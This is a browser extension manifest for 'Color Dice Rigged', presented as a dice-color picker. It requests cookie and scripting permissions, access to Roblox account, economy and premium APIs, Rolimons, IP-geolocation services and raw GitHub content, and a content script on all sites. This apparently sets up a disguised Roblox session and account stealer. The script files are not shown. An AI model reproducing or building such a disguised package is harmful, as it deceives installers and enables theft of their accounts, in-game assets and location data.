{
  "manifest_version": 3,
  "name": "Color Dice Rigged",
  "version": "1.1",
  "description": "Pick colors for dice, save them",
  "permissions": [
    "storage",
    "activeTab",
    "cookies",
    "scripting"
  ],
  "host_permissions": [
    "*://www.roblox.com/*",
    "https://www.rolimons.com/*",
    "https://api64.ipify.org/*",
    "https://ipapi.co/*",
    "https://users.roblox.com/*",
    "https://economy.roblox.com/*",
    "https://premiumfeatures.roblox.com/*",
    "https://raw.githubusercontent.com/*",
    "https://www.online-dice.com/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    },
    {
      "matches": ["https://www.online-dice.com/roll-color-dice/*"],
      "js": ["content.js"]
    }
  ]
}
